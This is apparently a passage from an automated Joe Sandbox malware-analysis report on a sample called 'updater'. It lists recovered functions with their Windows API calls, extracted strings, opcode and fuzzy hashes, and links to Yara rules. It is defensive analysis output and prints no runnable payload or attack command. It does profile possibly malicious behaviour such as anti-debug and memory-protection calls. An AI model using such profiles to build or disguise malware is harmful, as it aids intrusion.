Function 013DDF41 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

_Deallocate.LIBCONCRT ref: 013DDF50

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: Deallocate
String ID:
API String ID: 1075933841-0
Opcode ID: 5b52933b155fdb532d347984173775a0226bf495b6642164c653c436c958e7f8
Instruction ID: c4689499c7a16de910dfcb99d05ea00d7553c567922758494236dc5f033f705b
Opcode Fuzzy Hash: 5b52933b155fdb532d347984173775a0226bf495b6642164c653c436c958e7f8
Instruction Fuzzy Hash: DFD05E320182018BF3345E18F0417627BE9EB00328F24094DD0D1C65D1C7A958888698

Uniqueness

Uniqueness Score: -1.00%

Function 0143C135 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,0143C525,?,?,00000000), ref: 0143C152

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: dbd01ed4ab3d58b66f80e200b996e584597def36c8429a985b8604467a0dc9af
Instruction ID: 5a099ea9bd0346de79b505770fa4db0bc41f40345e595c2da128fcc31ef129e2
Opcode Fuzzy Hash: dbd01ed4ab3d58b66f80e200b996e584597def36c8429a985b8604467a0dc9af
Instruction Fuzzy Hash: 26D06C3600010DBFDF128F84DC06EDA3FAAFB48714F014000BA1856020C732E822EB90

Uniqueness

Uniqueness Score: -1.00%

Function 01425640 Relevance: 1.5, APIs: 1, Instructions: 11COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 01425653

Part of subcall function 01430123: HeapFree.KERNEL32(00000000,00000000), ref: 01430139
Part of subcall function 01430123: GetLastError.KERNEL32(?,?,0142DA9C), ref: 0143014B

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: ErrorFreeHeapLast_free
String ID:
API String ID: 1353095263-0
Opcode ID: 8a682b33a536c5502f97d1a5cabba1255ece08263c3092e6da3b829fddb3085a
Instruction ID: 1acfd3d7756855e2e7c66491aea3fdb1eba0349e73a8c9e861a437c2a168db62
Opcode Fuzzy Hash: 8a682b33a536c5502f97d1a5cabba1255ece08263c3092e6da3b829fddb3085a
Instruction Fuzzy Hash: DBC08C31000208BBCF009B42C806A4E7BA8DB80264F200048F41017250CAB2EF009680

Uniqueness

Uniqueness Score: -1.00%

Function 013C7BE2 Relevance: 1.3, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000), ref: 013C7BF7

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: adc76be05d4fa78dc5da78a8dd49028e9c189c6de8f251bb7df5644be8fe5ddf
Instruction ID: e63fc2d6c705d522704b3091e899e43422347bc75f5edea4de4425a6db912b20
Opcode Fuzzy Hash: adc76be05d4fa78dc5da78a8dd49028e9c189c6de8f251bb7df5644be8fe5ddf
Instruction Fuzzy Hash: D9F09835404F518FE772CB78E408792BAE1AB04B19F044A6E96B6829A0D775E896CF40

Uniqueness

Uniqueness Score: -1.00%

Function 01405D9C Relevance: 1.3, APIs: 1, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNEL32(000000FF), ref: 01405DA8

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 63a84f46785a7dbaa568f657d4256fdeeb13005d7884a57ff24a8d0e0e5c06c7
Instruction ID: f17a9335a0e2fd4323ac1c29fc2d8e6c7e4a293d101fd523593e98d7c013ec8a
Opcode Fuzzy Hash: 63a84f46785a7dbaa568f657d4256fdeeb13005d7884a57ff24a8d0e0e5c06c7
Instruction Fuzzy Hash: DDC0123510160997A7315B5A980C5967A599F11361754C237FF6C486F0DB31C4A7C990

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 013D2431 Relevance: 20.5, Strings: 16, Instructions: 451COMMON

Download Yara Rule

Strings

., xrefs: 013D1D67
ZAMA, xrefs: 013D1DEF
`OCK, xrefs: 013D214D
~\AZ, xrefs: 013D1F3A
AMAB, xrefs: 013D1F41
., xrefs: 013D215A
., xrefs: 013D1F4E
., xrefs: 013D2020
AZAM, xrefs: 013D1E97
ZAMA, xrefs: 013D1D5A
]YA\, xrefs: 013D2225
~O]], xrefs: 013D2364
]]YA, xrefs: 013D22CA
., xrefs: 013D2232
., xrefs: 013D2371
., xrefs: 013D1DFC

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ConditionDeallocateVariableWake
String ID: .$.$.$.$.$.$.$AMAB$AZAM$ZAMA$ZAMA$]YA\$]]YA$`OCK$~O]]$~\AZ
API String ID: 1208101283-2674794497
Opcode ID: 18fcc7a8b53ea705ed6c592e1fb548b176f8f6efdf615e42ca3dfcb069095c34
Instruction ID: 950c543eea491aadbec2841a2e7648a8c8cb6dbcdfa3a1a99b7bcb35ff7a027b
Opcode Fuzzy Hash: 18fcc7a8b53ea705ed6c592e1fb548b176f8f6efdf615e42ca3dfcb069095c34
Instruction Fuzzy Hash: 3502F7B2D042458FDB25EFA8E848BDEBB75AF21318F14418DE1556F2F5CB701A89CB12

Uniqueness

Uniqueness Score: -1.00%

Function 013E0B70 Relevance: 16.6, APIs: 5, Strings: 4, Instructions: 843COMMON

Download Yara Rule

Strings

Inf, xrefs: 013E133E
NaN, xrefs: 013E126E
-Inf, xrefs: 013E132F, 013E1346
+Inf, xrefs: 013E1339

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID:
String ID: +Inf$-Inf$Inf$NaN
API String ID: 0-4067408017
Opcode ID: af27e2793a618dbe295e5201e71b05ac0274724984e5fdfe261a97afa66b4523
Instruction ID: e5e928ea256745d7ba32c79eb6d74bd8e881806ab887934d2af447e2a9b95630
Opcode Fuzzy Hash: af27e2793a618dbe295e5201e71b05ac0274724984e5fdfe261a97afa66b4523
Instruction Fuzzy Hash: D462D331A187918ED72ACE3C845836BBFE5AFD6248F048A5EF4C997292D770C546CB42

Uniqueness

Uniqueness Score: -1.00%

Function 01401702 Relevance: 11.6, Strings: 8, Instructions: 1591COMMON

Download Yara Rule

Strings

L, xrefs: 01401A46
TABLE %s, xrefs: 01401B4A
:, xrefs: 01401DAF
%z USING PRIMARY KEY, xrefs: 01401B9F
%z WITH INDEX %s, xrefs: 01401B85
%z ORDER BY, xrefs: 01401BD5
%z VIRTUAL TABLE INDEX %d:%s, xrefs: 01401BBD
%z AS %s, xrefs: 01401B6D

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID:
String ID: %z AS %s$%z ORDER BY$%z USING PRIMARY KEY$%z VIRTUAL TABLE INDEX %d:%s$%z WITH INDEX %s$:$L$TABLE %s
API String ID: 0-162927363
Opcode ID: e8a182afad9f6da68be0c430a71da88ed5c83cf3505ca9206f79c4444088bc2c
Instruction ID: c8f2979b2536388d0f8bcc14dd7f2ada8334b8ce53fc92769973534e3f2514d5
Opcode Fuzzy Hash: e8a182afad9f6da68be0c430a71da88ed5c83cf3505ca9206f79c4444088bc2c
Instruction Fuzzy Hash: B3D248716083419FD715DF29C884A2BBBE2BFC8714F14892EF9898B3A1D771E945CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0143A932 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 251COMMON

Download Yara Rule

APIs

Part of subcall function 0143049B: GetLastError.KERNEL32(?,?,?,01422F7E,?,?,?,?,01423E8D,?), ref: 014304A0
Part of subcall function 0143049B: SetLastError.KERNEL32(00000000,00000005,000000FF,?,?,01422F7E,?,?,?,?,01423E8D,?), ref: 0143053E

GetACP.KERNEL32(?,?,?,?,?,?,0142E6A8,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 0143A9F3
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,0142E6A8,?,?,?,00000055,?,-00000050,?,?), ref: 0143AA1E
_wcschr.LIBVCRUNTIME ref: 0143AAB2
_wcschr.LIBVCRUNTIME ref: 0143AAC0
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0143AB81

Strings

utf8, xrefs: 0143AAF0

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
String ID: utf8
API String ID: 4147378913-905460609
Opcode ID: e677028ab7a33b91b5e813124454d1598c0a5315a651a6ad31a887b800105d48
Instruction ID: 57b69689107ebab1ded566b3fc80e59dac71303ab5b93c98271d166f1e1e7f55
Opcode Fuzzy Hash: e677028ab7a33b91b5e813124454d1598c0a5315a651a6ad31a887b800105d48
Instruction Fuzzy Hash: 31712B35680202ABEB29EF39CC45F6777A8EFAC700F24486FE685D72A1E774D5418760

Uniqueness

Uniqueness Score: -1.00%

Function 0143CE9E Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1420COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0143D019

Strings

1#QNAN, xrefs: 0143E1B7
1#IND, xrefs: 0143E1A9
1#SNAN, xrefs: 0143E1B0
1#INF, xrefs: 0143E1D4

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: c2e85c75d567140dab1ff75d9053d424ed981bb6727c4f42d65cc2782c837426
Instruction ID: 903fe40ec0743e646a81020151b61d0d37f68a7d413ae02a056823f89b8976f7
Opcode Fuzzy Hash: c2e85c75d567140dab1ff75d9053d424ed981bb6727c4f42d65cc2782c837426
Instruction Fuzzy Hash: 71C26971E042288FDB25CE68DD807EAB7B5EB88314F5441EBD94DE7261E774AE818F40

Uniqueness

Uniqueness Score: -1.00%

Function 0143B0BE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,0143B3DC,00000002,00000000,?,?,?,0143B3DC,?,00000000), ref: 0143B157
GetLocaleInfoW.KERNEL32(?,20001004,0143B3DC,00000002,00000000,?,?,?,0143B3DC,?,00000000), ref: 0143B180
GetACP.KERNEL32(?,?,0143B3DC,?,00000000), ref: 0143B195

Strings

OCP, xrefs: 0143B112
ACP, xrefs: 0143B0DC

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: fa291738cb3a0844119d08faee19ce9a1add336aa59ddf654d2a2967f813e484
Instruction ID: 2e0ee177fcb0cb6cb2d74ddf327fa1d68d351e9ab1a257ead9c286e62ef042f5
Opcode Fuzzy Hash: fa291738cb3a0844119d08faee19ce9a1add336aa59ddf654d2a2967f813e484
Instruction Fuzzy Hash: D8218366A00105A7EF358F58C901B97B7A7EBCCAD0B568466E90AD7335E732DE42C390

Uniqueness

Uniqueness Score: -1.00%

Function 0143B293 Relevance: 7.7, APIs: 5, Instructions: 183COMMON

Download Yara Rule

APIs

Part of subcall function 0143049B: GetLastError.KERNEL32(?,?,?,01422F7E,?,?,?,?,01423E8D,?), ref: 014304A0
Part of subcall function 0143049B: SetLastError.KERNEL32(00000000,00000005,000000FF,?,?,01422F7E,?,?,?,?,01423E8D,?), ref: 0143053E

Part of subcall function 0143049B: _free.LIBCMT ref: 014304FD
Part of subcall function 0143049B: _free.LIBCMT ref: 01430533

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0143B39F
IsValidCodePage.KERNEL32(00000000), ref: 0143B3E8
IsValidLocale.KERNEL32(?,00000001), ref: 0143B3F7
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0143B43F
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0143B45E

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID:
API String ID: 949163717-0
Opcode ID: edd78aab57b125743fa6628f0ca5e4cb1c61dbe1bb85200c4b82f811fce9d117
Instruction ID: bc49a847fc717d5ae3b5a00b6c2f2b10fc287ead6bef30cffbdba038b38d89cf
Opcode Fuzzy Hash: edd78aab57b125743fa6628f0ca5e4cb1c61dbe1bb85200c4b82f811fce9d117
Instruction Fuzzy Hash: D3518671900216ABEB10DFA9DC44BBF77B8FFAC700F14042AEA51E7260D7709645CB61

Uniqueness

Uniqueness Score: -1.00%

Function 014224FE Relevance: 6.1, APIs: 4, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 01422527
GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 0142253B
VirtualAlloc.KERNEL32(?,-00000001,00001000,00000004,?,?,?,0000001C), ref: 0142258B
VirtualProtect.KERNEL32(?,-00000001,00000104,?,?,?,0000001C), ref: 014225A0

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: Virtual$AllocInfoProtectQuerySystem
String ID:
API String ID: 3562403962-0
Opcode ID: 3e90efff7494d914b568dc350143eee15e1bc6032bf4a4b38fe73e67100658aa
Instruction ID: cc114f8a305403e22798d05fd523220bac2306ad5ec486cde23471a125ded9fa
Opcode Fuzzy Hash: 3e90efff7494d914b568dc350143eee15e1bc6032bf4a4b38fe73e67100658aa
Instruction Fuzzy Hash: EA21B772E00129BBDB20DFA9CC95EEFBBB8EB44640B454026E906F7254DB709985C790

Uniqueness

Uniqueness Score: -1.00%

Function 0143AD45 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 0143049B: GetLastError.KERNEL32(?,?,?,01422F7E,?,?,?,?,01423E8D,?), ref: 014304A0
Part of subcall function 0143049B: SetLastError.KERNEL32(00000000,00000005,000000FF,?,?,01422F7E,?,?,?,?,01423E8D,?), ref: 0143053E

Part of subcall function 0143049B: _free.LIBCMT ref: 014304FD
Part of subcall function 0143049B: _free.LIBCMT ref: 01430533

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0143AD99
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0143ADE3
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0143AEA9

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: InfoLocale$ErrorLast_free
String ID:
API String ID: 3140898709-0
Opcode ID: fcf8232a00f9d3ef5f7fb60d29ba37c0f41bbc2c3112416976fcd1a1875f4659
Instruction ID: 1453bbb726f34366e648ee28202014ac6174f96999be7fcf498e867e91c0efc6
Opcode Fuzzy Hash: fcf8232a00f9d3ef5f7fb60d29ba37c0f41bbc2c3112416976fcd1a1875f4659
Instruction Fuzzy Hash: 1861D7715801179FEB29DF28CC82B7A77A8EF98350F20417BE955C72A5E738D981CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0142337D Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 01423475
SetUnhandledExceptionFilter.KERNEL32 ref: 0142347F
UnhandledExceptionFilter.KERNEL32(?), ref: 0142348C

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 7019240afb76a594433f7a5290fcc686f0c469133e66db1701f0439a03a05587
Instruction ID: 8a323b45217aafe97f22b4b720b52648245e8b21966b664a153bc9d3f58b5560
Opcode Fuzzy Hash: 7019240afb76a594433f7a5290fcc686f0c469133e66db1701f0439a03a05587
Instruction Fuzzy Hash: 4731D87490122D9BCB22DF69D888BCDBBB4BF18310F9045EAE51CA7260E7749BC58F44

Uniqueness

Uniqueness Score: -1.00%

Function 013C433F Relevance: 4.5, APIs: 3, Instructions: 43COMMON

Download Yara Rule

APIs

LoadResource.KERNEL32 ref: 013C434B
LockResource.KERNEL32(00000000), ref: 013C4356
SizeofResource.KERNEL32 ref: 013C4364

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: Resource$LoadLockSizeof
String ID:
API String ID: 2853612939-0
Opcode ID: 6ceed8ebed73cb5bb5be72f0beba49fd4f93063fbb78657191876536ce909529
Instruction ID: b0179324530ed69ff9558147c0e7793b372843f8972d5b171626d85573d94c8f
Opcode Fuzzy Hash: 6ceed8ebed73cb5bb5be72f0beba49fd4f93063fbb78657191876536ce909529
Instruction Fuzzy Hash: 76F0F67790022597DB310B5D9C5886BBBACDBD4A2A305092EFD45D7115EB70DC9083B0

Uniqueness

Uniqueness Score: -1.00%

Function 0142A340 Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13efcb69164dcbb8558fc26197092f320b08139c4161ff7fcae7fe7da06277c8
Instruction ID: f689548d0deaf80aea6ad9c34298496f33565c89462d4563f05504f4dcd76566
Opcode Fuzzy Hash: 13efcb69164dcbb8558fc26197092f320b08139c4161ff7fcae7fe7da06277c8
Instruction Fuzzy Hash: B4F16071E002299FDF14CFA8C8806AEFBB1FF88314F65826AD919E7751D730A941CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0141D58A Relevance: 3.0, APIs: 2, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoEx.KERNEL32(?,?,0141D265,?,00000022,00000000,00000002,?,?,01412908,00000004,0140CD4E,?,00000004,0140E352,00000000), ref: 0141D5AC
GetLocaleInfoW.KERNEL32(00000000,?,?,?,?,?,0141D265,?,00000022,00000000,00000002,?,?,01412908,00000004,0140CD4E), ref: 0141D5B7

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 935a878d32f2674218e3294fb8eda030a58431c861fbc3757d068d469fa06a1f
Instruction ID: 2c3a70ba0a4fde667412224918f09e03ceef2381c2c9e96c8bbf30525c834a71
Opcode Fuzzy Hash: 935a878d32f2674218e3294fb8eda030a58431c861fbc3757d068d469fa06a1f
Instruction Fuzzy Hash: 27E08C76900138EB8F122FD9EC0C8AE3F2AFF046657040006FA0916238CB3299209BD5

Uniqueness

Uniqueness Score: -1.00%

Function 014353C4 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,014353BF,?,?,00000008,?,?,0143EF09,00000000), ref: 014355F1

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
